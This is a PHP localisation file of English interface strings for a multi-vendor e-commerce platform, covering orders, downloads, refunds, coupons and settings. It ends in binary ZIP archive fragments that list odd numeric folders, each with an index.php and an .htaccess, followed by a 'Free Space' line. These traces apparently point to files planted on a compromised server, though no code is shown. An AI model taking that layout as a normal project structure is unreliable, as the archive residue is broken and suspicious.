'download_your_product' => 'Download your product', 'download_Digital_Product' => 'Download Digital Product', 'invalid_order' => 'Invalid order', 'your_digital_product_is_ready.' => 'Your digital product is ready.', 'once_the_seller_has_uploaded_the_product__you_will_be_able_to_download_here_by_using_your_order_info.' => 'Once the seller has uploaded the product you will be able to download here by using your order info.', 'if_you_face_any_issue_during_download_please_until_wait_or_contact_admin_via' => 'If you face any issue during download please until wait or contact admin via', 'verified' => 'Verified', 'invalid_Order_Id_or_phone_Number' => 'Invalid Order Id or phone Number', 'your_have_not_any_digital_product_order' => 'Your have not any digital product order', 'your_have_not_any_digital_product_in_order' => 'Your have not any digital product in order', 'you_have_no_digital_products_in_your_order' => 'You have no digital products in your order', 'file_upload' => 'File upload', 'admin_have_no_permission_for_vendors_digital_product_upload' => 'Admin have no permission for vendors digital product upload', 'drag_and_drop_file_or_Browse_file' => 'Drag and drop file or Browse file', 'digital_file_upload_successfully' => 'Digital file upload successfully', 'an_OTP_has_been_sent_to_your_email_and_phone' => 'An OTP has been sent to your email and phone', 'please_enter_the_OTP_in_the_field_below_to_verify_for_this_download' => 'Please enter the OTP in the field below to verify for this download', 'order_Not_Found' => 'Order Not Found', 'enter_your_order_ID_&_phone_to_get_delivery_updates' => 'Enter your order ID & phone to get delivery updates', 'order_Created_At' => 'Order Created At', 'your_order_has_been_processed' => 'Your order has been processed', 'check_your_email_to_get_the_order_id_and_details' => 'Check your email to get the order id and details', 'View Less' => 'View Less', 'Shop-12_Road-8' => 'Shop-12 Road-8', 'View More' => 'View More', 'if_Flat _discount_amount_will_be_set_as_fixed_amount._If_Percentage _discount_amount_will_be_set_as_percentage.' => 'If Flat discount amount will be set as fixed amount. If Percentage discount amount will be set as percentage.', 'pending_Orders' => 'Pending Orders', 'if_disabled_customers_have_to_use_the_system_added_payment_gateways' => 'If disabled customers have to use the system added payment gateways', 'want_to_Turn_OFF_Offline_Payment_Methods' => 'Want to Turn OFF Offline Payment Methods', 'is_required' => 'Is required', 'if_disabled_vendors_can_not_sell_digital_products_in_their_shops' => 'If disabled vendors can not sell digital products in their shops', 'free_delivery_over_amount_for_every_vendor_if_they_do_not_set_any_range_yet' => 'Free delivery over amount for every vendor if they do not set any range yet', 'free_delivery_over' => 'Free delivery over', 'free_delivery_responsibility' => 'Free delivery responsibility', 'customer_referral_earning' => 'Customer referral earning', 'enjoy_a_borderless_business_experience_with_' => 'Enjoy a borderless business experience with ', 'you_cannot_deliver_to_any_specific_country_or_zip_code_areas_if_it’s_not_added_and_saved' => 'You cannot deliver to any specific country or zip code areas if it’s not added and saved', 'If_only_the ‘Delivery_Available_Zip_Code_Area’ feature_is_enabled _then_you’ll_be_able_to_deliver_on_all_the_zip_code_areas' => 'If only the ‘Delivery Available Zip Code Area’ feature is enabled then you’ll be able to deliver on all the zip code areas', 'want_update_this_invoice_settings' => 'Want update this invoice settings', 'entries' => 'Entries', 'no_matching_data_found' => 'No matching data found', 'total_entries' => 'Total entries', 'filtered' => 'Filtered', 'New_Currency_inserted_successfully' => 'New Currency inserted successfully', 'if_you_enable_it_customers_will_see_Cookie_Settings_in_frontend' => 'If you enable it customers will see Cookie Settings in frontend', 'make_sure_before_changing' => 'Make sure before changing', 'download_generate_sitemap' => 'Download generate sitemap', 'Add_dynamic_url_to_secure_employee_login_access' => 'Add dynamic url to secure employee login access', 'want_to_Turn_ON_Offline_Payment_Methods' => 'Want to Turn ON Offline Payment Methods', 'push_a_description_and_also_identifier_and_continue' => 'Push a description and also identifier and continue', 'social_info_updated_successfully' => 'Social info updated successfully', 'choose_images' => 'Choose images', 'deal' => 'Deal', 'thumbnail' => 'Thumbnail', 'react_domain' => 'React domain', 'please_make_sure_all_the product`s_delivery_charges_are_up_to_date' => 'Please make sure all the product`s delivery charges are up to date', 'Page_Expired' => 'Page Expired', 'please_enter_coupon_code' => 'Please enter coupon code', 'please_enter_discount_amount' => 'Please enter discount amount', 'want_to_place_this_order' => 'Want to place this order', 'email_is_required' => 'Email is required', 'email_must_be_valid' => 'Email must be valid', 'email_already_in_use' => 'Email already in use', 'please_ensure_your_phone_number_is_valid_and_does_not_exceed_20_characters' => 'Please ensure your phone number is valid and does not exceed 20 characters', 'phone_number_with_a_minimum_length_requirement_of_4_characters' => 'Phone number with a minimum length requirement of 4 characters', 'Customer_Registration_Successfully_Completed' => 'Customer Registration Successfully Completed', 'thank_you_for_joining' => 'Thank you for joining', 'if_you_want_to_become_a_registered_customer_then_reset_your_password_below_by_using_this_' => 'If you want to become a registered customer then reset your password below by using this ', 'then_you’ll_be_able_to_explore_the_website_and_app_as_a_registered_customer' => 'Then you’ll be able to explore the website and app as a registered customer', 'reset_Password' => 'Reset Password', 'meanwhile_click_here_to_visit_' => 'Meanwhile click here to visit ', 'please_' => 'Please ', '_contact_us' => ' contact us', '_for_any_queries' => ' for any queries', 'customer_added_successfully' => 'Customer added successfully', 'invoice_Settings' => 'Invoice Settings', 'invoice_settings' => 'Invoice settings', 'Terms_&_Condition' => 'Terms & Condition', 'Business identity' => 'Business identity', 'tax_Id' => 'Tax Id', 'bin_Number' => 'Bin Number', 'musak' => 'Musak', 'enter' => 'Enter', 'invoice_logo' => 'Invoice logo', 'invoice_settings_update_successfully' => 'Invoice settings update successfully', 'want_to_Turn_ON_Employee_Status' => 'Want to Turn ON Employee Status', 'role_not_found' => 'Role not found', 'employee_role_setup' => 'Employee role setup', 'select_all' => 'Select all', 'system_settings' => 'System settings', 'employee_Role_List' => 'Employee Role List', 'role_Name' => 'Role Name', 'Modules' => 'Modules', 'created_At' => 'Created At', 'employee_Role_Analytics' => 'Employee Role Analytics', 'active_Employee_Role' => 'Active Employee Role', 'inactive_Employee_Role' => 'Inactive Employee Role', 'use_this_product_info' => 'Use this product info', 'create_a_unique_product_code_by_clicking_on_the_Generate_Code_button' => 'Create a unique product code by clicking on the Generate Code button', 'reference_ID' => 'Reference ID', 'please_rate_the_quality' => 'Please rate the quality', 'The_comment_is_required' => 'The comment is required', 'there_is_no_vendor' => 'There is no vendor', 'credentials_doesnt_match' => 'Credentials doesnt match', 'there_is_no_Brand' => 'There is no Brand', 'my_Compare_List' => 'My Compare List', 'want_to_clear_all_compare_list' => 'Want to clear all compare list', 'You_have_not_added_product_to_compare_yet' => 'You have not added product to compare yet', 'want_to_clear_all_wishlist' => 'Want to clear all wishlist', 'You_have_not_added_product_to_wishlist_yet' => 'You have not added product to wishlist yet', 'There_is_no_product' => 'There is no product', 'You_have_not_any_order_yet' => 'You have not any order yet', 'my_Loyalty_Point' => 'My Loyalty Point', 'total_points' => 'Total points', 'all_transactions' => 'All transactions', 'all_transaction' => 'All transaction', 'order_Place' => 'Order Place', 'point_To_wallet' => 'Point To wallet', 'minimum_point_for_convert_to_currency_is' => 'Minimum point for convert to currency is', 'you_don’t_have_any' => 'You don’t have any', 'No_message_found' => 'No message found', 'No_ticket_created_yet' => 'No ticket created yet', 'No_coupon_available' => 'No coupon available', 'No_address_found' => 'No address found', 'No_review_yet' => 'No review yet', 'shipping_Not_Available_for' => 'Shipping Not Available for', 'Congratulations' => 'Congratulations', 'thank_you_for_choosing_' => 'Thank you for choosing ', 'your_digital_product_is_ready_for_download' => 'Your digital product is ready for download', 'to_download_your_product' => 'To download your product', '_use_your_email_' => ' use your email ', '_and' => ' and', '_order' => ' order', '_below' => ' below', 'to_verify_when_download_your_product' => 'To verify when download your product', '_use_your_order_info' => ' use your order info', 'click_below' => 'Click below', 'don’t_share_your_order_information' => 'Don’t share your order information', '_it’s_confidential' => ' it’s confidential', '_if_you_share_this_info' => ' if you share this info', '_then_anyone_can_download' => ' then anyone can download', 'you_can_only_delivery_in_added_zip_code_areas_that_has_already_selected_by_admin' => 'You can only delivery in added zip code areas that has already selected by admin', 'you_can_only_deliver_orders_to_the_selected_countries_which_admin_selected' => 'You can only deliver orders to the selected countries which admin selected', 'Halar' => 'Halar', 'approved_products' => 'Approved products', 'vendor_apply' => 'Vendor apply', 'open_your_shop_and_start_selling' => 'Open your shop and start selling', 'image_size_must_be_within_2_MB' => 'Image size must be within 2 MB', 'image_type_must_be_within_.jpg .png .jpeg .gif' => 'Image type must be within .jpg .png .jpeg .gif', 'environment_variables_updated_successfully' => 'Environment variables updated successfully', 'To_order_digital_product' => 'To order digital product', '_kindly_fill_up_the_“Add_New_Customer”_form' => ' kindly fill up the “Add New Customer” form', 'joined_date' => 'Joined date', 'want_to_refund_this_refund_request' => 'Want to refund this refund request', 'hgfdsa' => 'Hgfdsa', 'want_to_approv_this_refund_request' => 'Want to approv this refund request', 'please_write_the_approve_reason' => 'Please write the approve reason', 'then_you_can’t_change_this_status' => 'Then you can’t change this status', 'without_a_proper_payment_info you_cannot_change_the_Refund_Status' => 'Without a proper payment info you cannot change the Refund Status', 'please_enter_the_payment_information_according_to_your_chosen_payment_method' => 'Please enter the payment information according to your chosen payment method', 'then_you_won’t_able_change_any_status' => 'Then you won’t able change any status', 'once_you_refund_that_refund_request' => 'Once you refund that refund request', 'order_volume(high_to_low)' => 'Order volume(high to low)', 'order_volume(low_to_high)' => 'Order volume(low to high)', 'inventory_quantity(high_to_low)' => 'Inventory quantity(high to low)', 'inventory_quantity(low_to_high)' => 'Inventory quantity(low to high)', 'generate_Barcode' => 'Generate Barcode', 535 => '535', 'order_Report_Statement' => 'Order Report Statement', 'total_Ordered_Amount' => 'Total Ordered Amount', 'total_Shipping_Charge' => 'Total Shipping Charge', 'total_Order_Commission' => 'Total Order Commission', 'total_Deliveryman_Incentive' => 'Total Deliveryman Incentive', 'search_by_payment_method_name' => 'Search by payment method name', 'You_have_not_added_anything_to_your_cart_yet' => 'You have not added anything to your cart yet', 'language_name' => 'Language name', 'showing' => 'Showing', 'Loading' => 'Loading', 'delivery_man_added_successfully' => 'Delivery man added successfully', 'let_us_shopping_today' => 'Let us shopping today', 'request_Time' => 'Request Time', 'total_Withdraw_Request' => 'Total Withdraw Request', 'notify_all_the_vendors' => 'Notify all the vendors', 'no_employee_found' => 'No employee found', 'employee Add' => 'Employee Add', 'add_new_employee' => 'Add new employee', 'John_Doe' => 'John Doe', 'identify_type' => 'Identify type', 'select_identify_type' => 'Select identify type', 'NID' => 'NID', 'identify_number' => 'Identify number', 'Attribute1' => 'Attribute1', 'Attribute2' => 'Attribute2', 'Attribute3' => 'Attribute3', 'The password and con password must match.' => 'The password and con password must match.', 'registration_successful' => 'Registration successful', 'no_withdraw_request_found' => 'No withdraw request found', 'denied_Request' => 'Denied Request', 'approved_Request' => 'Approved Request', 'total__Request' => 'Total Request', 'withdraw_Request_Analytics' => 'Withdraw Request Analytics', 'delivery_Man_Withdraw_Request_List' => 'Delivery Man Withdraw Request List', 'Already_have_account ' => 'Already have account ', 'Maintenance_is_on' => 'Maintenance is on', 'Maintenance_is_off' => 'Maintenance is off', 'you_can_not_update_this_on_demo_mode' => 'You can not update this on demo mode', 'header_content' => 'Header content', 'main_title' => 'Main title', 'mail_body' => 'Mail body', 'product_information' => 'Product information', 'Product Information will be automatically bind from database' => 'Product Information will be automatically bind from database', 'If you don’t want to see the information in the mail' => 'If you don’t want to see the information in the mail', 'just turn the switch button off' => 'Just turn the switch button off', 'button_content' => 'Button content', 'button_name' => 'Button name', 'redirect_link' => 'Redirect link', 'order_information' => 'Order information', 'order_Information_will_be_automatically_bind_from_database' => 'Order Information will be automatically bind from database', 'if_you don’t_want_to see_the_information_in_the_mail' => 'If you don’t want to see the information in the mail', 'just_turn_the_switch_button_off' => 'Just turn the switch button off', 'footer_content' => 'Footer content', 'section_text' => 'Section text', 'page_links' => 'Page links', 'social_media_links' => 'Social media links', 'copyright_content' => 'Copyright content', 'all_right_reserved' => 'All right reserved', 'get_email_on' => 'Get email on', 'get_email_on_' => 'Get email on ', 'want_to_Turn_OFF_this_mail' => 'Want to Turn OFF this mail', 'want_to_Turn_ON_this_mail' => 'Want to Turn ON this mail', 'if_disabled_users_would_not_receive_this_mail' => 'If disabled users would not receive this mail', 'if_enabled_users_will_receive_this_mail' => 'If enabled users will receive this mail', 'template_UI' => 'Template UI', 'product_information_will_be_automatically_bind_from_database' => 'Product information will be automatically bind from database', 'If_you_don’t_want_to_see_the_information_in_the_mail' => 'If you don’t want to see the information in the mail', 'we’re_always_happy_to_help' => 'We’re always happy to help', 'social_media_deleted_successfully' => 'Social media deleted successfully', 'social_Media_inserted_Successfully' => 'Social Media inserted Successfully', 'Time & Date' => 'Time & Date', 'please_ensure_your_code_does_not_exceed_20_characters' => 'Please ensure your code does not exceed 20 characters', 'code_with_a_minimum_length_requirement_of_6_characters' => 'Code with a minimum length requirement of 6 characters', '+' => '+', 'announcement_updated_successfully' => 'Announcement updated successfully', 'push_notification_setup' => 'Push notification setup', 'firebase_configuration' => 'Firebase configuration', 'for_Vendor' => 'For Vendor', 'customer_block_message' => 'Customer block message', 'customer_unblock_message' => 'Customer unblock message', 'product_request_approved_message' => 'Product request approved message', 'product_request_rejected_message' => 'Product request rejected message', 'go_to_Firebase_Console' => 'Go to Firebase Console', 'open_your_web_browser_an_ go_to_the_Firebase_Console' => 'Open your web browser an go to the Firebase Console', '(' => '(', 'https://console.firebase.google.com/' => 'Https://console.firebase.google.com/', ').' => ').', 'select_the_project_for_which_you_want_to_configure_FCM_from_the_Firebase_Console_dashboard' => 'Select the project for which you want to configure FCM from the Firebase Console dashboard', 'navigate_to_project_settings' => 'Navigate to project settings', 'in_the_left-hand_menu _click_on_the' => 'In the left-hand menu click on the', 'gear_icon _and_then_select' => 'Gear icon and then select', 'from_the_dropdown' => 'From the dropdown', 'in_the_Project_settings_page _click_on_the' => 'In the Project settings page click on the', 'Cloud_Messaging' => 'Cloud Messaging', 'tab_from_the_top_menu' => 'Tab from the top menu', 'obtain_all_the_information_asked' => 'Obtain all the information asked', 'In_the_Firebase_Project_settings_page _click_on_the_ General _tab_from_the_top_menu' => 'In the Firebase Project settings page click on the General tab from the top menu', 'under_the' => 'Under the', 'Your_Apps' => 'Your Apps', 'section' => 'Section', 'WEB' => 'WEB', 'app_for_which_you_want_to_configure_FCM' => 'App for which you want to configure FCM', 'then_obtain' => 'Then obtain', 'API_Key' => 'API Key', 'Auth_Domain' => 'Auth Domain', 'Storage_Bucket' => 'Storage Bucket', 'Messaging_Sender_ID' => 'Messaging Sender ID', 'please_make_sure_to_use_the_obtained_information_securely_and_in_accordance_with_Firebase_and_FCM_documentation _terms_of_service _and_any_applicable_laws_and_regulations' => 'Please make sure to use the obtained information securely and in accordance with Firebase and FCM documentation terms of service and any applicable laws and regulations', 'change_password_request' => 'Change password request', 'copyright_' => 'Copyright ', 'want_to_Turn_ON_the_smtp_mail_config_option' => 'Want to Turn ON the smtp mail config option', 'enabling_mail_configuration_services_will_allow_the_system_to_send_emails' => 'Enabling mail configuration services will allow the system to send emails', 'please_ensure_that_you_have_correctly_configured_the_SMTP_settings_to_avoid_potential_issues_with_email_delivery' => 'Please ensure that you have correctly configured the SMTP settings to avoid potential issues with email delivery', 'want_to_Turn_ON_the_sendgrid_mail_config_option' => 'Want to Turn ON the sendgrid mail config option', 'please_ensure_that_you_have_correctly_configured_the_sendgrid_settings_to_avoid_potential_issues_with_email_delivery' => 'Please ensure that you have correctly configured the sendgrid settings to avoid potential issues with email delivery', 'the_name_field_is_required!' => 'The name field is required!', 'the_host_field_is_required!' => 'The host field is required!', 'the_driver_field_is_required!' => 'The driver field is required!', 'the_port_field_is_required!' => 'The port field is required!', 'the_username_field_is_required!' => 'The username field is required!', 'the_email_field_is_required!' => 'The email field is required!', 'the_encryption_field_is_required!' => 'The encryption field is required!', 'the_password_field_is_required!' => 'The password field is required!', 'refund_Order_List' => 'Refund Order List', 'refund_Status' => 'Refund Status', 'total pending refund_Requests' => 'Total pending refund Requests', 'filter_By' => 'Filter By', 'product_Information' => 'Product Information', 'product_Amount' => 'Product Amount', 'Refund_Amount' => 'Refund Amount', 'store_Name' => 'Store Name', 'delivery_Name' => 'Delivery Name', 'refund_Reason' => 'Refund Reason', 'hwj hwo qoyw vsh w skow wh' => 'Hwj hwo qoyw vsh w skow wh', 'asdf' => 'Asdf', 'total refunded refund_Requests' => 'Total refunded refund Requests', 'There are many variations of passages of Lorem Ipsum available but the majority have suffered alteration in some form by injected humour or randomised words which don t look even slightly believable.' => 'There are many variations of passages of Lorem Ipsum available but the majority have suffered alteration in some form by injected humour or randomised words which don t look even slightly believable.', 'rejected_refund_Requests' => 'Rejected refund Requests', 'total rejected refund_Requests' => 'Total rejected refund Requests', 'It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters as opposed to using Content here content here making it look like readable English. Many desktop publishing packages and web page editors now use Lorem Ipsum as their default model text and a search for lorem ipsum will uncover many web sites still in their infancy. Various versions have evolved over the years sometimes by accident sometimes on purpose (injected humour and the like).' => 'It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters as opposed to using Content here content here making it look like readable English. Many desktop publishing packages and web page editors now use Lorem Ipsum as their default model text and a search for lorem ipsum will uncover many web sites still in their infancy. Various versions have evolved over the years sometimes by accident sometimes on purpose (injected humour and the like).', 'Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry s standard dummy text ever since the 1500s when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries but also the leap into electronic typesetting remaining essentially unchanged.' => 'Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry s standard dummy text ever since the 1500s when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries but also the leap into electronic typesetting remaining essentially unchanged.', 'product quality is not good' => 'Product quality is not good', 'product quality is not good. product quality is not good. product quality is not good.' => 'Product quality is not good. product quality is not good. product quality is not good.', 'all_Customers' => 'All Customers', 'item_Price' => 'Item Price', 'or_some_coupons_are_for_all_vendors' => 'Or some coupons are for all vendors', 'feature_deal_table' => 'Feature deal table', 'coupon_List' => 'Coupon List', 'coupon_Title' => 'Coupon Title', 'coupon_Code' => 'Coupon Code', 'coupon_Type' => 'Coupon Type', 'number_of_Uses' => 'Number of Uses', 'limit_for_Same_User' => 'Limit for Same User', 'min_Purchase_Amount' => 'Min Purchase Amount', 'max_discount_Amount' => 'Max discount Amount', 'coupon_Bearer' => 'Coupon Bearer', 'discount_on_purchase' => 'Discount on purchase', 'first_order' => 'First order', 'want_to_Turn_ON_Coupon_Status' => 'Want to Turn ON Coupon Status', 'want_to_Turn_OFF_Coupon_Status' => 'Want to Turn OFF Coupon Status', 'in_House_Orders' => 'In House Orders', 'in_House_Products' => 'In House Products', 'order_Transaction_Report_List' => 'Order Transaction Report List', 'vendor_Net_income' => 'Vendor Net income', 'expanse_Transaction_Report_List' => 'Expanse Transaction Report List', 'product_Report_List' => 'Product Report List', 'total_Amount Sold' => 'Total Amount Sold', 'product_Stock_Report_List' => 'Product Stock Report List', 'stock_Sort_By' => 'Stock Sort By', 'low_to_high' => 'Low to high', 'current_Stock ' => 'Current Stock ', 'order_Report_List' => 'Order Report List', 'vendor_Withdraw_Request' => 'Vendor Withdraw Request', 'vendor_Withdraw_Analytics' => 'Vendor Withdraw Analytics', 'total_Pending' => 'Total Pending', 'total_Approved' => 'Total Approved', 'total_Denied' => 'Total Denied', 'back_to_delivery-man_list' => 'Back to delivery-man list', 'collect_cash' => 'Collect cash', 'delivery_man_account' => 'Delivery man account', 'Failed_To_Deliver' => 'Failed To Deliver', 'earning_history' => 'Earning history', '_contact_info' => ' contact info', 'delivery_Man_List' => 'Delivery Man List', 'delivery_Man_Analytics' => 'Delivery Man Analytics', 'total_Delivery_Man' => 'Total Delivery Man', 'active_Delivery_Man' => 'Active Delivery Man', 'inactive_Delivery_man' => 'Inactive Delivery man', 'delivery_Man_Image' => 'Delivery Man Image', 'all_product_List' => 'All product List', 'pending_products' => 'Pending products', 'pending_for_approval_products' => 'Pending for approval products', 'new-request_product_List' => 'New-request product List', 'time_&_Date' => 'Time & Date', 'Temporary_OFF' => 'Temporary OFF', 'email_template' => 'Email template', 'don’t_show_again' => 'Don’t show again', 'click_to_view' => 'Click to view', 'there_isn’t_enough_quantity_on_stock' => 'There isn’t enough quantity on stock', 'please_check_products_in_limited_stock' => 'Please check products in limited stock', '_more_products_have_low_stock' => ' more products have low stock', 'this_product_is_low_on_stock' => 'This product is low on stock', 'priority_setup' => 'Priority setup', 'brands_are_lists_of_the_specific_products' => 'Brands are lists of the specific products', '_organize_by_putting_the_newest_ones_at_the_top_and_arranging_everything_alphabetically' => ' organize by putting the newest ones at the top and arranging everything alphabetically', 'use_default_sorting_list' => 'Use default sorting list', 'currently_sorting_this_section_based_on_latest_add' => 'Currently sorting this section based on latest add', 'use_custom_sorting_list' => 'Use custom sorting list', 'you_can_sorting_this_section_by_others_way' => 'You can sorting this section by others way', 'sort_by_latest_created' => 'Sort by latest created', 'sort_by_first_created' => 'Sort by first created', 'sort_by_most_order' => 'Sort by most order', 'sort_by_Alphabetical' => 'Sort by Alphabetical', 'the_category_list_groups_similar_products_together_arranged_with_the_latest_category_first_and_in_alphabetical_order' => 'The category list groups similar products together arranged with the latest category first and in alphabetical order', 'currently_sorting_this_section_based_on_priority_wise' => 'Currently sorting this section based on priority wise', 'vendor_list' => 'Vendor list', 'the_Vendor_list_arranges_all_vendors_based_on_the_latest_join_that_are_highly_rated_by_customer_choice_and_also_in_alphabetic_order' => 'The Vendor list arranges all vendors based on the latest join that are highly rated by customer choice and also in alphabetic order', 'currently_sorting_this_section_based_on_first_created' => 'Currently sorting this section based on first created', 'sort_by_reviews_count' => 'Sort by reviews count', 'sort_by_ratings' => 'Sort by ratings', 'show_currently_closed_stores_in_the_last' => 'Show currently closed stores in the last', 'remove_currently_closed_stores_from_the_list' => 'Remove currently closed stores from the list', 'none' => 'None', 'show_temporarily_off_stores_in_the_last' => 'Show temporarily off stores in the last', 'remove_temporarily_off_stores_from_the_list' => 'Remove temporarily off stores from the list', 'the_featured_product_means_the_product_list_which_are_mostly_ordered' => 'The featured product means the product list which are mostly ordered', '_customers_choice_and_have_good_reviews_&_ratings' => ' customers choice and have good reviews & ratings', 'show_stock_out_products_in_the_last' => 'Show stock out products in the last', 'remove_stock_out_products_from_the_list' => 'Remove stock out products from the list', 'show_product_in_the_last_if_store_is_temporarily_off' => 'Show product in the last if store is temporarily off', 'remove_product_from_the_list_if_store_is_temporarily_off' => 'Remove product from the list if store is temporarily off', 'top_vendor' => 'Top vendor', 'top_vendor_list_refers_to_displaying_a_list_based_on_most_ordered_items_of_that_vendor_and_highly_rated' => 'Top vendor list refers to displaying a list based on most ordered items of that vendor and highly rated', 'show_4+_rated_sellers' => 'Show 4+ rated sellers', 'show_3.5+_rated_sellers' => 'Show 3.5+ rated sellers', 'show_2+_rated_sellers' => 'Show 2+ rated sellers', 'sort_by_order' => 'Sort by order', 'Category_wise_product_list' => 'Category wise product list', 'category_or_subcategory_wise_product_list_is_for_displaying_the_products_which_are_mostly_ordered' => 'Category or subcategory wise product list is for displaying the products which are mostly ordered', 'currently_sorting_this_section_based_on_orders' => 'Currently sorting this section based on orders', 'top_rated_products_are_the_mostly_ordered_product_list_of_customer_choice_which_are_highly_rated_&_reviewed' => 'Top rated products are the mostly ordered product list of customer choice which are highly rated & reviewed', 'currently_sorting_this_section_based_on_review_count' => 'Currently sorting this section based on review count', 'show_4+_rated_products' => 'Show 4+ rated products', 'show_3.5+_rated_products' => 'Show 3.5+ rated products', 'show_3+_rated_products' => 'Show 3+ rated products', 'best_selling_products' => 'Best selling products', 'best_selling_products_are_those_items_that_are_purchased_by_customers_mostly_compared_to_other_products_within_a_specific_period' => 'Best selling products are those items that are purchased by customers mostly compared to other products within a specific period', 'currently_sorting_this_section_based_on_order_count' => 'Currently sorting this section based on order count', 'products_list' => 'Products list', 'Search_Bar' => 'Search Bar', 'the_product_list_(Search_Bar)_is_the_list_of_those_products_which_appear_during_search_based_on_product_availability' => 'The product list (Search Bar) is the list of those products which appear during search based on product availability', 'currently_sorting_this_section_by_keyword_wise' => 'Currently sorting this section by keyword wise', 'show_product_in_the_last_is_store_is_temporarily_off' => 'Show product in the last is store is temporarily off', 'vendor_product_list' => 'Vendor product list', 'the_vendor_product_list_is_for_displaying_the_products_which_are_mostly_ordered' => 'The vendor product list is for displaying the products which are mostly ordered', '_have_good_reviews_&_sorted_alphabetically' => ' have good reviews & sorted alphabetically', 'featured_product_priority_setup_updated_successfully' => 'Featured product priority setup updated successfully', 'otp_verified_successfully' => 'Otp verified successfully', 'add_to_compare_list' => 'Add to compare list', 'closed_Now' => 'Closed Now', 'vendor_product_list_priority_setup_updated_successfully' => 'Vendor product list priority setup updated successfully', 'vendor_list_priority_setup_updated_successfully' => 'Vendor list priority setup updated successfully', 'top_vendor_list_priority_setup_updated_successfully' => 'Top vendor list priority setup updated successfully', 'top_Stores' => 'Top Stores', );PK ! ]��� � en/auth.phpnu �[��� PK ! *sN, , � en/passwords.phpnu �[��� PK ! �Q�� � N en/validation.phpnu �[��� PK ! ' en/index.phpnu �[��� PK ! �^W�4� 4� c en/473851/index.phpnu �[��� PK ! ����� � �� en/473851/.htaccessnu �[��� PK ! �L��X X �� en/pagination.phpnu �[��� PK ! �%�* �* �� en/messages.phpnu �[��� PK ! �!(( ( � en/message.phpnu �[��� PK ! M}P�� � in/messages.phpnu �[��� PK ! ��� � @� bd/messages.phpnu �[��� PK ! X:�|W |W 8� es/messages.phpnu �[��� PK ! ]��� � � sa/auth.phpnu �[��� PK ! *sN, , � sa/passwords.phpnu �[��� PK ! �Q�� � A sa/validation.phpnu �[��� PK ! �L��X X ! sa/pagination.phpnu �[��� PK ! ��[� � �! sa/messages.phpnu �[��� PK ! �!(( ( �>! sa/message.phpnu �[��� PK ! O?! ae/index.phpnu �[��� PK ! eG�l� � �?! ae/30273/index.phpnu �[��� PK ! ����� � _M$ ae/30273/.htaccessnu �[��� PK ! ��e��� �� }N$ ae/messages.phpnu �[��� PK � Z +
Free Space : Byte